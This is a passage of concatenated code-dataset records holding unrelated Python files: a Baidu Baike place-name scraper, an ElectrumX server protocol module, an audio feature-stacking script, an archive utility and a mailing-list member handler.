cityName_all_dict[city[1][:-1]].append({'id': city[0], 'pid': city[2]})\r\n\r\n for c in cityName_all :\r\n if c !=None:\r\n cityName_all_dict[c].append({'id': city[1], 'pid': city[2]})\r\n print('city count %d,all_city count %d' % (len(cityIndex), len(cityName_all_dict)))\r\n return cityName_all_dict, cityIndex\r\n\r\n def readfile(self):\r\n places=[]\r\n with open('./resources/regions.txt','r',encoding='utf-8') as f:\r\n for line in f.readlines():\r\n line=line.strip()\r\n item=line.split('\\t')\r\n if item=='':break\r\n places.append(item)\r\n return places\r\n\r\n def gen(self):\r\n places=self.readfile()\r\n place_dict,place_index=self.genCity(places)\r\n fou = open('./mod/place_dict.bin', 'wb')\r\n pickle.dump(place_dict, fou)\r\n fou.close()\r\n fou = open('./mod/place_index.bin', 'wb')\r\n pickle.dump(place_index, fou)\r\n fou.close()\r\n fou = open('./mod/baidu_place.bin', 'wb')\r\n pickle.dump(self.baidu_place, fou)\r\n fou.close()\r\n\r\n # cities = self.query_city_name('SELECT CityID,CityName,ProvinceID FROM s_city')\r\n # city_dict, city_index = self.genCity(cities)\r\n # s_districtes = self.query_city_name('SELECT DistrictID,DistrictName,CityID FROM s_district')\r\n # district_dict, district_index = self.genCity(s_districtes)\r\n # s_provinces = self.query_city_name('SELECT ProvinceID,ProvinceName,Abbreviation FROM s_province')\r\n # province_dict, province_index = self.genCity(s_provinces)\r\n #\r\n # fou = open('./mod/city_dict.bin', 'wb')\r\n # pickle.dump(city_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/city_index.bin', 'wb')\r\n # pickle.dump(city_index, fou)\r\n # fou.close()\r\n # fou = open('./mod/district_dict.bin', 'wb')\r\n # pickle.dump(district_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/district_index.bin', 'wb')\r\n # pickle.dump(district_index, fou)\r\n # fou.close()\r\n # fou = open('./mod/province_dict.bin', 'wb')\r\n # pickle.dump(province_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/province_index.bin', 'wb')\r\n # pickle.dump(province_index, fou)\r\n # fou.close()\r\n\r\n def getBaiduSame(self,place):\r\n if self.baidu_place.get(place):\r\n # logging.info('find %s from baidu_place' % place )\r\n return self.parseHtml(place, self.baidu_place.get(place))\r\n\r\n\r\n url='https://baike.baidu.com/item/'\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\r\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9,image/webp, * / *;q = 0.8',\r\n 'Accept-Language': 'zh-CN, zh;q = 0.9'\r\n }\r\n try:\r\n wb_data = requests.get(url+place,headers=headers,allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n except:\r\n return []\r\n content = wb_data.text\r\n return self.parseHtml(place,content)\r\n\r\n def parseHtml(self,place,content):\r\n\r\n clear = re.compile(']*?>[\\\\s\\\\S]*?<\\\\/script>', re.I)#re.compile('<\\s*script[^>]*>[^<]*<\\s*/\\s*script\\s*>', re.I)\r\n\r\n content = clear.sub(\"\", content)\r\n # content=str(content,encoding='utf-8')\r\n # logging.info(content)\r\n # self.save_db(place,content)\r\n self.baidu_place[place]=content\r\n\r\n soup = BeautifulSoup(content, 'html.parser')\r\n [script.extract() for script in soup.findAll('script')]\r\n # s=soup.text\r\n\r\n try:\r\n title_node = soup.find('dd', class_='lemmaWgt-lemmaTitle-title').find('h1').text\r\n except:\r\n return []\r\n '''\r\n
别    名
\r\n
\r\n 三袁故里、百湖之县\r\n
\r\n '''\r\n def parse_alias(alias):\r\n alias=self.tp.remove_noisy(alias)\r\n if alias[-1]=='等': alias=alias[:-1]\r\n alias=re.sub(r'[%s|\\/,;]' % punctuation,'、',alias)\r\n return alias.split('、')\r\n samenames =[title_node]# soup.find('dt', class_='basicInfo-item name', text='中文名称').find_next('dd').text.strip().split('、')\r\n try:\r\n alias=soup.find('dt', class_='basicInfo-item name', text='别    名').find_next('dd').text.strip()\r\n # alias\r\n samenames.extend(parse_alias(alias))\r\n except:\r\n None\r\n try:\r\n alias=soup.find('dt', class_='basicInfo-item name', text='简    称').find_next('dd').text.strip()\r\n samenames.extend(alias.split('、'))\r\n except:\r\n None\r\n # samenames=samenames1.extend(samenames2).extend(samenames3)\r\n # logging.info(samenames)\r\n return samenames\r\n '''\r\n 失败,有字符集问题\r\n '''\r\n def save_db(self,place,content):\r\n logging.info(content)\r\n con = self.connect_db()\r\n con.autocommit(True)\r\n cur = con.cursor()\r\n cur.execute(\"insert into baidu_place values(%s,%s)\",(place,content))\r\n cur.close()\r\n con.close()\r\n return\r\n\r\n def getZhishi(self,place):\r\n if self.zhishi_place.get(place):\r\n logging.info('find %s from zhishi_place' % place )\r\n return self.baidu_place.get(place)\r\n\r\n\r\n url='http://zhishi.me/api/entity/%s?property=infobox'\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\r\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9,image/webp, * / *;q = 0.8',\r\n 'Accept-Language': 'zh-CN, zh;q = 0.9'\r\n }\r\n try:\r\n wb_data = requests.get(url % place,headers=headers,allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n content = wb_data.json()\r\n logging.info(str(content))\r\n ret1 = jsonpath.jsonpath(content, \"$..'别称:'\")\r\n logging.info(str(ret1[0]))\r\n if ret1:\r\n return ret1[0][0].split('、')\r\n\r\n except:\r\n return []\r\n '''\r\n 这个基本不可用\r\n '''\r\n def getXLORE(self,place):\r\n url ='http://api.xlore.org/query?instances='\r\n url='http://api.xlore.org/relations?instance=%s&relation=%s'\r\n try:\r\n wb_data = requests.get(url % ('任正非','职务'),allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n content = wb_data.json()\r\n logging.info(str(content))\r\n return content\r\n\r\n except:\r\n return []\r\nif __name__=='__main__':\r\n g = GeoKG()\r\n # g.gen()\r\n # s='习近平在重庆调研时强调,创新、协调、绿色、开放、共享的发展理念,一带一路是在深刻总结国内外发展经验教训、分析国内外发展大势的基础上形成的,凝聚着对经济社会发展规律的深入思考,体现了“十三五”乃至更长时期我国的发展思路、发展方向、发展着力点。'\r\n # g.parseDoc(s)\r\n # g.test()\r\n # g.getBaiduSame('连云港')\r\n print(g.getXLORE('北京故宫博物院'))","sub_path":"global_geo_test.py","file_name":"global_geo_test.py","file_ext":"py","file_size_in_byte":31717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"260112504","text":"# Copyright (c) 2016, Neil Booth\n#\n# All rights reserved.\n#\n# See the file \"LICENCE\" for information about the copyright\n# and warranty status of this software.\n\n'''Classes for local RPC server and remote client TCP/SSL servers.'''\n\n\nimport asyncio\nimport codecs\nimport json\nimport ssl\nimport time\nimport traceback\nfrom collections import namedtuple\nfrom functools import partial\n\nfrom lib.hash import sha256, double_sha256, hash_to_str, hex_str_to_hash\nfrom lib.jsonrpc import JSONRPC, json_notification_payload\nfrom lib.util import LoggedClass\nfrom server.block_processor import BlockProcessor\nfrom server.daemon import DaemonError\nfrom server.irc import IRC\nfrom server.version import VERSION\n\n\nclass BlockServer(BlockProcessor):\n '''Like BlockProcessor but also has a server manager and starts\n servers when caught up.'''\n\n def __init__(self, env):\n super().__init__(env)\n self.server_mgr = ServerManager(self, env)\n self.bs_caught_up = False\n\n async def caught_up(self, mempool_hashes):\n await super().caught_up(mempool_hashes)\n if not self.bs_caught_up:\n await self.server_mgr.start_servers()\n self.bs_caught_up = True\n self.server_mgr.notify(self.height, self.touched)\n\n def stop(self):\n '''Close the listening servers.'''\n self.server_mgr.stop()\n\n\nclass ServerManager(LoggedClass):\n '''Manages the servers.'''\n\n AsyncTask = namedtuple('AsyncTask', 'session job')\n\n def __init__(self, bp, env):\n super().__init__()\n self.bp = bp\n self.env = env\n self.servers = []\n self.irc = IRC(env)\n self.sessions = set()\n self.tasks = asyncio.Queue()\n self.current_task = None\n\n async def start_server(self, kind, *args, **kw_args):\n loop = asyncio.get_event_loop()\n protocol_class = LocalRPC if kind == 'RPC' else ElectrumX\n protocol = partial(protocol_class, self, self.bp, self.env, kind)\n server = loop.create_server(protocol, *args, **kw_args)\n\n host, port = args[:2]\n try:\n self.servers.append(await server)\n except asyncio.CancelledError:\n raise\n except Exception as e:\n self.logger.error('{} server failed to listen on {}:{:d} :{}'\n .format(kind, host, port, e))\n else:\n self.logger.info('{} server listening on {}:{:d}'\n .format(kind, host, port))\n\n async def start_servers(self):\n '''Connect to IRC and start listening for incoming connections.\n\n Only connect to IRC if enabled. Start listening on RCP, TCP\n and SSL ports only if the port wasn pecified.\n '''\n env = self.env\n\n if env.rpc_port is not None:\n await self.start_server('RPC', 'localhost', env.rpc_port)\n\n if env.tcp_port is not None:\n await self.start_server('TCP', env.host, env.tcp_port)\n\n if env.ssl_port is not None:\n # FIXME: update if we want to require Python >= 3.5.3\n sslc = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n sslc.load_cert_chain(env.ssl_certfile, keyfile=env.ssl_keyfile)\n await self.start_server('SSL', env.host, env.ssl_port, ssl=sslc)\n\n asyncio.ensure_future(self.run_tasks())\n\n if env.irc:\n self.logger.info('starting IRC coroutine')\n asyncio.ensure_future(self.irc.start())\n else:\n self.logger.info('IRC disabled')\n\n def notify(self, height, touched):\n '''Notify sessions about height changes and touched addresses.'''\n sessions = [session for session in self.sessions\n if isinstance(session, ElectrumX)]\n ElectrumX.notify(sessions, height, touched)\n\n def stop(self):\n '''Close the listening servers.'''\n for server in self.servers:\n server.close()\n\n def add_session(self, session):\n assert session not in self.sessions\n self.sessions.add(session)\n\n def remove_session(self, session):\n self.sessions.remove(session)\n if self.current_task and session == self.current_task.session:\n self.logger.info('cancelling running task')\n self.current_task.job.cancel()\n\n def add_task(self, session, job):\n assert session in self.sessions\n task = asyncio.ensure_future(job)\n self.tasks.put_nowait(self.AsyncTask(session, task))\n\n async def run_tasks(self):\n '''Asynchronously run through the task queue.'''\n while True:\n task = await self.tasks.get()\n try:\n if task.session in self.sessions:\n self.current_task = task\n await task.job\n else:\n task.job.cancel()\n except asyncio.CancelledError:\n self.logger.info('cancelled task noted')\n except Exception:\n # Getting here should probably be considered a bug and fixed\n traceback.print_exc()\n finally:\n self.current_task = None\n\n def irc_peers(self):\n return self.irc.peers\n\n def session_count(self):\n return len(self.sessions)\n\n def info(self):\n '''Returned in the RPC 'getinfo' call.'''\n address_count = sum(len(session.hash168s)\n for session in self.sessions\n if isinstance(session, ElectrumX))\n return {\n 'blocks': self.bp.height,\n 'peers': len(self.irc_peers()),\n 'sessions': self.session_count(),\n 'watched': address_count,\n 'cached': 0,\n }\n\n def sessions_info(self):\n '''Returned to the RPC 'sessions' call.'''\n now = time.time()\n return [(session.kind,\n session.peername(),\n len(session.hash168s),\n 'RPC' if isinstance(session, LocalRPC) else session.client,\n session.recv_count, session.recv_size,\n session.send_count, session.send_size,\n session.error_count,\n now - session.start)\n for session in self.sessions]\n\n\nclass Session(JSONRPC):\n '''Base class of ElectrumX JSON session protocols.'''\n\n def __init__(self, manager, bp, env, kind):\n super().__init__()\n self.manager = manager\n self.bp = bp\n self.env = env\n self.daemon = bp.daemon\n self.coin = bp.coin\n self.kind = kind\n self.hash168s = set()\n self.client = 'unknown'\n\n def connection_made(self, transport):\n '''Handle an incoming client connection.'''\n super().connection_made(transport)\n self.logger.info('connection from {}'.format(self.peername()))\n self.manager.add_session(self)\n\n def connection_lost(self, exc):\n '''Handle client disconnection.'''\n super().connection_lost(exc)\n if self.error_count or self.send_size >= 250000:\n self.logger.info('{} disconnected. '\n 'Sent {:,d} bytes in {:,d} messages {:,d} errors'\n .format(self.peername(), self.send_size,\n self.send_count, self.error_count))\n self.manager.remove_session(self)\n\n def method_handler(self, method):\n '''Return the handler that will handle the RPC method.'''\n return self.handlers.get(method)\n\n def on_json_request(self, request):\n '''Queue the request for asynchronous handling.'''\n self.manager.add_task(self, self.handle_json_request(request))\n\n def peername(self):\n info = self.peer_info\n return 'unknown' if not info else '{}:{}'.format(info[0], info[1])\n\n def tx_hash_from_param(self, param):\n '''Raise an RPCError if the parameter is not a valid transaction\n hash.'''\n if isinstance(param, str) and len(param) == 64:\n try:\n bytes.fromhex(param)\n return param\n except ValueError:\n pass\n raise RPCError('parameter should be a transaction hash: {}'\n .format(param))\n\n def hash168_from_param(self, param):\n if isinstance(param, str):\n try:\n return self.coin.address_to_hash168(param)\n except:\n pass\n raise RPCError('parameter should be a valid address: {}'.format(param))\n\n def non_negative_integer_from_param(self, param):\n try:\n param = int(param)\n except ValueError:\n pass\n else:\n if param >= 0:\n return param\n\n raise RPCError('param should be a non-negative integer: {}'\n .format(param))\n\n def extract_hash168(self, params):\n if len(params) == 1:\n return self.hash168_from_param(params[0])\n raise RPCError('params should contain a single address: {}'\n .format(params))\n\n def extract_non_negative_integer(self, params):\n if len(params) == 1:\n return self.non_negative_integer_from_param(params[0])\n raise RPCError('params should contain a non-negative integer: {}'\n .format(params))\n\n def require_empty_params(self, params):\n if params:\n raise RPCError('params should be empty: {}'.format(params))\n\n\nclass ElectrumX(Session):\n '''A TCP server that handles incoming Electrum connections.'''\n\n def __init__(self, *args):\n super().__init__(*args)\n self.subscribe_headers = False\n self.subscribe_height = False\n self.notified_height = None\n rpcs = [\n ('blockchain',\n 'address.get_balance address.get_history address.get_mempool '\n 'address.get_proof address.listunspent address.subscribe '\n 'block.get_header block.get_chunk estimatefee headers.subscribe '\n 'numblocks.subscribe relayfee transaction.broadcast '\n 'transaction.get transaction.get_merkle utxo.get_address'),\n ('server',\n 'banner donation_address peers.subscribe version'),\n ]\n self.handlers = {'.'.join([prefix, suffix]):\n getattr(self, suffix.replace('.', '_'))\n for prefix, suffixes in rpcs\n for suffix in suffixes.split()}\n\n @classmethod\n def notify(cls, sessions, height, touched):\n headers_payload = height_payload = None\n\n for session in sessions:\n if height != session.notified_height:\n session.notified_height = height\n if session.subscribe_headers:\n if headers_payload is None:\n headers_payload = json_notification_payload(\n 'blockchain.headers.subscribe',\n (session.electrum_header(height), ),\n )\n session.send_json(headers_payload)\n\n if session.subscribe_height:\n if height_payload is None:\n height_payload = json_notification_payload(\n 'blockchain.numblocks.subscribe',\n (height, ),\n )\n session.send_json(height_payload)\n\n hash168_to_address = session.coin.hash168_to_address\n for hash168 in session.hash168s.intersection(touched):\n address = hash168_to_address(hash168)\n status = session.address_status(hash168)\n payload = json_notification_payload(\n 'blockchain.address.subscribe', (address, status))\n session.send_json(payload)\n\n def height(self):\n '''Return the block processor's current height.'''\n return self.bp.height\n\n def current_electrum_header(self):\n '''Used as response to a headers subscription request.'''\n return self.electrum_header(self.height())\n\n def electrum_header(self, height):\n '''Return the binary header at the given height.'''\n if not 0 <= height <= self.height():\n raise RPCError('height {:,d} out of range'.format(height))\n header = self.bp.read_headers(height, 1)\n return self.coin.electrum_header(header, height)\n\n def address_status(self, hash168):\n '''Returns status as 32 bytes.'''\n # Note history is ordered and mempool unordered in electrum-server\n # For mempool, height is -1 if unconfirmed txins, otherwise 0\n history = self.bp.get_history(hash168)\n mempool = self.bp.mempool_transactions(hash168)\n\n status = ''.join('{}:{:d}:'.format(hash_to_str(tx_hash), height)\n for tx_hash, height in history)\n status += ''.join('{}:{:d}:'.format(hex_hash, -unconfirmed)\n for hex_hash, tx_fee, unconfirmed in mempool)\n if status:\n return sha256(status.encode()).hex()\n return None\n\n async def tx_merkle(self, tx_hash, height):\n '''tx_hash is a hex string.'''\n hex_hashes = await self.daemon.block_hex_hashes(height, 1)\n block = await self.daemon.deserialised_block(hex_hashes[0])\n tx_hashes = block['tx']\n # This will throw if the tx_hash is bad\n pos = tx_hashes.index(tx_hash)\n\n idx = pos\n hashes = [hex_str_to_hash(txh) for txh in tx_hashes]\n merkle_branch = []\n while len(hashes) > 1:\n if len(hashes) & 1:\n hashes.append(hashes[-1])\n idx = idx - 1 if (idx & 1) else idx + 1\n merkle_branch.append(hash_to_str(hashes[idx]))\n idx //= 2\n hashes = [double_sha256(hashes[n] + hashes[n + 1])\n for n in range(0, len(hashes), 2)]\n\n return {\"block_height\": height, \"merkle\": merkle_branch, \"pos\": pos}\n\n def get_history(self, hash168):\n # Note history is ordered and mempool unordered in electrum-server\n # For mempool, height is -1 if unconfirmed txins, otherwise 0\n history = self.bp.get_history(hash168, limit=None)\n mempool = self.bp.mempool_transactions(hash168)\n\n conf = tuple({'tx_hash': hash_to_str(tx_hash), 'height': height}\n for tx_hash, height in history)\n unconf = tuple({'tx_hash': tx_hash, 'height': -unconfirmed, 'fee': fee}\n for tx_hash, fee, unconfirmed in mempool)\n return conf + unconf\n\n def get_chunk(self, index):\n '''Return header chunk as hex. Index is a non-negative integer.'''\n chunk_size = self.coin.CHUNK_SIZE\n next_height = self.height() + 1\n start_height = min(index * chunk_size, next_height)\n count = min(next_height - start_height, chunk_size)\n return self.bp.read_headers(start_height, count).hex()\n\n def get_balance(self, hash168):\n confirmed = self.bp.get_balance(hash168)\n unconfirmed = self.bp.mempool_value(hash168)\n return {'confirmed': confirmed, 'unconfirmed': unconfirmed}\n\n def list_unspent(self, hash168):\n utxos = self.bp.get_utxos_sorted(hash168)\n return tuple({'tx_hash': hash_to_str(utxo.tx_hash),\n 'tx_pos': utxo.tx_pos, 'height': utxo.height,\n 'value': utxo.value}\n for utxo in utxos)\n\n # --- blockchain commands\n\n async def address_get_balance(self, params):\n hash168 = self.extract_hash168(params)\n return self.get_balance(hash168)\n\n async def address_get_history(self, params):\n hash168 = self.extract_hash168(params)\n return self.get_history(hash168)\n\n async def address_get_mempool(self, params):\n hash168 = self.extract_hash168(params)\n raise RPCError('get_mempool is not yet implemented')\n\n async def address_get_proof(self, params):\n hash168 = self.extract_hash168(params)\n raise RPCError('get_proof is not yet implemented')\n\n async def address_listunspent(self, params):\n hash168 = self.extract_hash168(params)\n return self.list_unspent(hash168)\n\n async def address_subscribe(self, params):\n hash168 = self.extract_hash168(params)\n self.hash168s.add(hash168)\n return self.address_status(hash168)\n\n async def block_get_chunk(self, params):\n index = self.extract_non_negative_integer(params)\n return self.get_chunk(index)\n\n async def block_get_header(self, params):\n height = self.extract_non_negative_integer(params)\n return self.electrum_header(height)\n\n async def estimatefee(self, params):\n return await self.daemon.estimatefee(params)\n\n async def headers_subscribe(self, params):\n self.require_empty_params(params)\n self.subscribe_headers = True\n return self.current_electrum_header()\n\n async def numblocks_subscribe(self, params):\n self.require_empty_params(params)\n self.subscribe_height = True\n return self.height()\n\n async def relayfee(self, params):\n '''The minimum fee a low-priority tx must pay in order to be accepted\n to the daemon's memory pool.'''\n self.require_empty_params(params)\n return await self.daemon.relayfee()\n\n async def transaction_broadcast(self, params):\n '''Pass through the parameters to the daemon.\n\n An ugly API: current Electrum clients only pass the raw\n transaction in hex and expect error messages to be returned in\n the result field. And the server shouldn't be doing the client's\n user interface job here.\n '''\n try:\n tx_hash = await self.daemon.sendrawtransaction(params)\n self.logger.info('sent tx: {}'.format(tx_hash))\n return tx_hash\n except DaemonError as e:\n error = e.args[0]\n message = error['message']\n self.logger.info('sendrawtransaction: {}'.format(message))\n if 'non-mandatory-script-verify-flag' in message:\n return (\n 'Your client produced a transaction that is not accepted '\n 'by the network any more. Please upgrade to Electrum '\n '2.5.1 or newer.'\n )\n\n return (\n 'The transaction was rejected by network rules. ({})\\n[{}]'\n .format(message, params[0])\n )\n\n async def transaction_get(self, params):\n '''Return the serialized raw transaction.'''\n # For some reason Electrum passes a height. Don't require it\n # in anticipation it might be dropped in the future.\n if 1 <= len(params) <= 2:\n tx_hash = self.tx_hash_from_param(params[0])\n return await self.daemon.getrawtransaction(tx_hash)\n\n raise RPCError('params wrong length: {}'.format(params))\n\n async def transaction_get_merkle(self, params):\n if len(params) == 2:\n tx_hash = self.tx_hash_from_param(params[0])\n height = self.non_negative_integer_from_param(params[1])\n return await self.tx_merkle(tx_hash, height)\n\n raise RPCError('params should contain a transaction hash and height')\n\n async def utxo_get_address(self, params):\n if len(params) == 2:\n tx_hash = self.tx_hash_from_param(params[0])\n index = self.non_negative_integer_from_param(params[1])\n tx_hash = hex_str_to_hash(tx_hash)\n hash168 = self.bp.get_utxo_hash168(tx_hash, index)\n if hash168:\n return self.coin.hash168_to_address(hash168)\n return None\n\n raise RPCError('params should contain a transaction hash and index')\n\n # --- server commands\n\n async def banner(self, params):\n '''Return the server banner.'''\n self.require_empty_params(params)\n banner = 'Welcome to Electrum!'\n if self.env.banner_file:\n try:\n with codecs.open(self.env.banner_file, 'r', 'utf-8') as f:\n banner = f.read()\n except Exception as e:\n self.logger.error('reading banner file {}: {}'\n .format(self.env.banner_file, e))\n return banner\n\n async def donation_address(self, params):\n '''Return the donation address as a string.\n\n If none is specified return the empty string.\n '''\n self.require_empty_params(params)\n return self.env.donation_address\n\n async def peers_subscribe(self, params):\n '''Returns the peer (ip, host, ports) tuples.\n\n Despite the name electrum-server does not treat this as a\n subscription.\n '''\n self.require_empty_params(params)\n return list(self.manager.irc_peers().values())\n\n async def version(self, params):\n '''Return the server version as a string.'''\n if len(params) == 2:\n self.client = str(params[0])\n self.protocol_version = params[1]\n return VERSION\n\n\nclass LocalRPC(Session):\n '''A local TCP RPC server for querying status.'''\n\n def __init__(self, *args):\n super().__init__(*args)\n cmds = 'getinfo sessions numsessions peers numpeers'.split()\n self.handlers = {cmd: getattr(self, cmd) for cmd in cmds}\n\n async def getinfo(self, params):\n return self.manager.info()\n\n async def sessions(self, params):\n return self.manager.sessions_info()\n\n async def numsessions(self, params):\n return self.manager.session_count()\n\n async def peers(self, params):\n return self.manager.irc_peers()\n\n async def numpeers(self, params):\n return len(self.manager.irc_peers())\n","sub_path":"server/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":21809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"330926195","text":"from Util import *\nimport soundfile as sf\nfrom sklearn.mixture import BayesianGaussianMixture, GaussianMixture\nimport numpy as np\n\n'''\n****************\nFor Testing we read the features extracted\nfor testing from Features2 folder instead of \nFeatures folder and save the featurelist in \nthe name of featurelist2 instead of featurelist\n****************\n'''\n\n'''\n****************\nChanging the name to Features2\n****************\n'''\nFeatureFiles = ListAllFiles(\"/home/srinath/Desktop/SpeakerRecognition/Features2\", Extention = \"npy\")\n# print(len(FeatureFiles))\nstack = loadnp(FeatureFiles[0])[1:13, :].transpose()\nprint(\"done0\")\n# print(stack.shape)\nFeatureFiles.remove(FeatureFiles[0])\nlenFeatureFiles = len(FeatureFiles)\nfor x in range(lenFeatureFiles) :\n feature = loadnp(FeatureFiles[x]).transpose()\n stack = np.concatenate((stack, feature[:, 1:13]),)\n # print(stack.shape)\n print(\"done\"+ str(x+1))\nprint(stack.shape)\n\n\n'''\n****************\nSaving the feature stack in the name\nof featurelist2\n****************\n'''\nsavenp( arr = stack, filename = \"/home/srinath/Desktop/SpeakerRecognition/FeatureStack/featurelist2\")\n","sub_path":"Python Files/ubm_feature_stacking.py","file_name":"ubm_feature_stacking.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"22080690","text":"import zipfile\nimport gzip\nimport os\nimport tarfile\nimport shutil\nfrom io import BytesIO\nimport abc\n\n\ndef zipped(filename, *args, **kwargs):\n method = os.path.splitext(filename)[1][1:]\n if method == \"zip\":\n return Zip().zip(filename, *args, **kwargs)\n else:\n return Gzip().zip(filename, *args, **kwargs)\n\n\ndef unzipped(filename, *args, **kwargs):\n method = os.path.splitext(filename)[1][1:]\n if method == \"zip\":\n return Zip().unzip(filename, *args, **kwargs)\n else:\n return Gzip().unzip(filename, *args, **kwargs)\n\n\nclass BaseZipper(object):\n __metaclass_ = abc.ABCMeta\n _comp = None\n\n @abc.abstractmethod\n def zip(self, *args, **kwargs):\n pass\n\n @abc.abstractmethod\n def unzip(self, *args, **kwargs):\n pass\n\n\nclass Zip(BaseZipper):\n _comp = zipfile.PyZipFile\n\n def zip(self, zip_name, *paths, mode=\"w\"):\n zip_name = os.path.splitext(zip_name)[0] + \".zip\"\n zf = self._comp(zip_name, mode)\n for path in paths:\n if os.path.isdir(path):\n for root, dirs, files in os.walk(path):\n for file in files:\n zf.write(os.path.join(root, file))\n else:\n zf.write(path)\n\n def unzip(self, zip_name, mode=\"r\"):\n zf = self._comp(zip_name, mode)\n for name in zf.namelist():\n dir_path = os.path.splitext(name)[1]\n if len(dir_path) > 0 and not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n with open(name, \"wb\") as file:\n file.write(zf.read(name))\n\n\nclass Gzip(BaseZipper):\n\n _comp = gzip.GzipFile\n\n def zip(self, zip_name, *paths, mode=\"w\"):\n if len(paths) > 1:\n zip_name = os.path.splitext(zip_name)[1] + \".tar\"\n self._tarball(zip_name, *paths)\n elif len(paths) == 1:\n if os.path.splitext(zip_name)[1] != \".gz\":\n zip_name += \".gz\"\n self._gzip(zip_name, paths[0])\n\n def unzip(self, zip_name):\n with gzip.open(zip_name, \"rb\") as gzfile:\n output_name = os.path.splitext(zip_name)[1]\n if os.path.splitext(output_name)[1] == \".tar\":\n with tarfile.open(\"w\", fileobj=BytesIO(gzfile.read())) as output_file:\n output_file.extractall()\n output_file.close()\n else:\n with open(output_name, \"wb\") as output:\n output.write(gzfile.read())\n\n def _tarball(self, zip_name, *paths):\n with tarfile.open(zip_name, \"w:gz\") as tar:\n for path in paths:\n tar.add(path, arcname=os.path.basename(path))\n\n self._gzip(zip_name+\".gz\", zip_name)\n\n os.remove(zip_name)\n\n @staticmethod\n def _gzip(zip_name, file_name):\n with open(file_name, 'rb') as f_in:\n with gzip.open(zip_name, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n\n\n","sub_path":"apogee/utils/processing/zipping.py","file_name":"zipping.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"608410586","text":"import json\nimport os\nimport re\nfrom app.authentication import BaseRequestHandler\nfrom app.mail_helper import send_mail\nfrom app.model.list_model import List, get_list_by_id\nimport logging\nfrom app.model.member import get_member_and_list_by_member_id\nfrom google.appengine.ext.webapp import template\n\n__author__ = 'simonhutton'\n\n\nclass ManageMembers(BaseRequestHandler):\n def post(self):\n json_request = json.loads(self.request.body)\n\n address = json_request['email'].lower()\n name = json_request['name']\n parent_list_id = json_request['parentListId']\n send_welcome = json_request['sendWelcome']\n\n user = self.current_user\n\n response = {}\n\n if user:\n found_list = get_list_by_id(parent_list_id)\n\n if found_list:\n if found_list.is_admin(self.current_user):\n if len(found_list.members) < found_list.max_members:\n new_member = found_list.add_member_to_list(address, name)\n\n if send_welcome:\n send_add_member_email(found_list, new_member)\n\n response = new_member.to_dict()\n self.response.status = 200\n else:\n response['message'] = \"Too many members. Max. \" + str(found_list.max_members) + \".\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n else:\n response['message'] = \"You need to be an administrator add members.\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n\n self.response.out.write(json.dumps(response))\n\n def delete(self):\n response = {}\n\n matches = re.match(\n r\"/list/members/(?P.*)\",\n self.request.path)\n\n if matches:\n member_id = matches.group(\"member_id\")\n\n user = self.current_user\n\n if user:\n member, found_list = get_member_and_list_by_member_id(member_id)\n\n if found_list:\n if found_list.is_admin(self.current_user):\n found_list.members.remove(member.key)\n\n found_list.put()\n\n member.key.delete()\n\n self.response.status = 200\n else:\n response['message'] = \"You need to be an administrator remove members.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'])\n self.response.status = 401\n else:\n response['message'] = 'Could not parse path ' + self.request.path\n logging.error(response['message'])\n self.response.status = 500\n\n self.response.out.write(json.dumps(response))\n\n def put(self):\n response = {}\n\n matches = re.match(\n r\"/list/members/(?P.*)\",\n self.request.path)\n\n json_request = json.loads(self.request.body)\n\n name = json_request['name']\n\n if matches:\n member_id = matches.group(\"member_id\")\n\n user = self.current_user\n\n if user:\n member, found_list = get_member_and_list_by_member_id(member_id)\n\n if found_list:\n if found_list.is_admin(self.current_user):\n member.name = name\n\n member.put()\n\n response = member.to_dict()\n\n self.response.status = 200\n else:\n response['message'] = \"You need to be an administrator remove members.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'])\n self.response.status = 401\n else:\n response['message'] = 'Could not parse path ' + self.request.path\n logging.error(response['message'])\n self.response.status = 500\n\n self.response.out.write(json.dumps(response))\n\n\ndef send_add_member_email(found_list, member):\n template_values = {'member': member,\n 'list': found_list,\n 'owner_email': found_list.get_admin_email(),\n 'owner_name': found_list.get_admin_name()}\n\n path = os.path.join(os.path.join(os.path.dirname(__file__), 'html'), '../../templates/mail/add_member.txt')\n rendered_mail 